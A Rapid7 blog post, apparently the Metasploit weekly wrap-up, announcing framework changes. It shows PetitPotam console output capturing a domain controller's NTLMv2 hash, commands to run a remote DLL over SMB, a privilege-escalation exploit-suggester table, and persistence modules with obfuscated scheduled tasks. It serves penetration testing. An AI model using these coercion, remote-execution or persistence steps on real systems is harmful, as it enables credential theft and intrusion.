Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/27/metasploit-weekly-wrap-up-158-2/
PetitPotam Improvements
Metasploit’s Ruby support has been updated to allow anonymous authentication to SMB servers. This is notably useful while exploiting the PetitPotam vulnerability with Metasploit, which can be used to coerce a Domain Controller to send an authentication attempt over SMB to other machines via MS-EFSRPC methods:
msf6 auxiliary(scanner/dcerpc/petitpotam) > run 192.168.159.10
[*] 192.168.159.10:445 - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445 - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445 - Attempting to coerce authentication via EfsRpcOpenFileRaw
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 192.168.159.10
[SMB] NTLMv2-SSP Username : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash : WIN-3MSP8K2LCGC$::MSFLAB:768ec6a80487d57b:c5bae280991f0814f92bbbd5cce710df:0101000000000000806cc79fb364d801fed140b07186c36f000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f005500500007000800806cc79fb364d80106000400020000000800300030000000000000000000000000400000ee85f088ff3d462c936ca209ddc2cc835a9df7261cf96264158f81bf31035a980a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000
[+] 192.168.159.10:445 - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >
Full details can be found in the Metasploit PetitPotam documentation.
Standalone SMB Server tool
Our very own Spencer McIntyre has added support for creating a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB 1/2/3, as well as encryption support for SMB3.
Example usage:
ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point .
This can be useful for copying files onto remote targets, or running remote DLLs:
copy \\192.168.123.1\home\example.txt .
rundll32.exe \\192.168.123.1\home\example.dll,0
Local Exploit suggester improvements
The post/multi/recon/local_exploit_suggester module is a post-exploitation module which iterates through multiple relevant Metasploit modules and automatically checks for local vulnerabilities that may lead to privilege escalation.
This module has been updated with a number of bug fixes, as well as having the UX has been improved to more clearly highlight which modules are viable:
msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0
3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.
4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable.
5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.
6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. Detected polkit framework version 0.105.
8 exploit/linux/local/su_login Yes The target appears to be vulnerable.
9 exploit/android/local/futex_requeue No The check raised an exception.
10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable.
11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable.
12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable.
14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable.
15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception.
16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.
Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase – due to session platform/arch/type mismatches. This is useful for evaluating modules which may require manually migrating from a Shell session to Meterpreter, or from a Python Meterpreter to a Native Meterpreter to gain local privilege escalation etc.
New module content (1)
- #16488 from cdelafuente-r7 – This updates the
exploit/windows/local/vss_persistenceandpost/windows/manage/persistence_exemodules to optionally obfuscate scheduled tasks. Additionally, thepost/windows/manage/persistence_exewas updated with a new "TASK" startup technique that allows users to obtain persistence via a scheduled task.
Enhancements and features (7)
- #16413 from sjanusz-r7 – Updates the
multi/recon/local_exploit_suggesterwith multiple enhancements, including the ability to correctly work with Java/Python Meterpreters as well as now generating a readable table of results. - #16481 from zeroSteiner – This updates the
Msf::Exploit::Remote::SMB::Server::Sharemixin to use RubySMB, which now supports SMB versions 1-3, along with various other features like accounting, state logging, session tracking, support for multiple files etc. All existing modules that were using this mixin will now automatically benefit from these improvements. They will work again against modern versions of Windows where SMBv1 has been disabled. - #16518 from adfoster-r7 – Merge Metasploit framework wiki into Metasploit framework.
- #16600 from adfoster-r7 – Update docs site to use migrated wiki files.
- #16610 from zeroSteiner – Updates the module
windows/dcerpc/cve_2021_1675_printnightmarefrom being an auxiliary that would require the user to setup and configure an external Samba share to host the payload to an all-inclusive exploit. This means users can deliver their payloads in a seamless fashion without needing to deal with Samba. - #16620 from zeroSteiner – Adds a standalone tool for creating a read-only SMB 2/3 server from the current working directory. Usage:
ruby ./tools/smb_file_server.rb. Normal SMB clients can then connect to this share and download files as normal. For instance via Windows withcopy \\192.168.123.1\home\example.exe .ornet use \\192.168.123.1\home /u:WORKGROUP\metasploit password
Bugs fixed (1)
- #16619 from NikitaKovaljov – This fixes a bug in neighbor advertisement filtering as used by the
auxiliary/scanner/discover/ipv6_neighbormodule. Prior to this patch, the module would fail to map IPv4 to IPv6 addresses.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).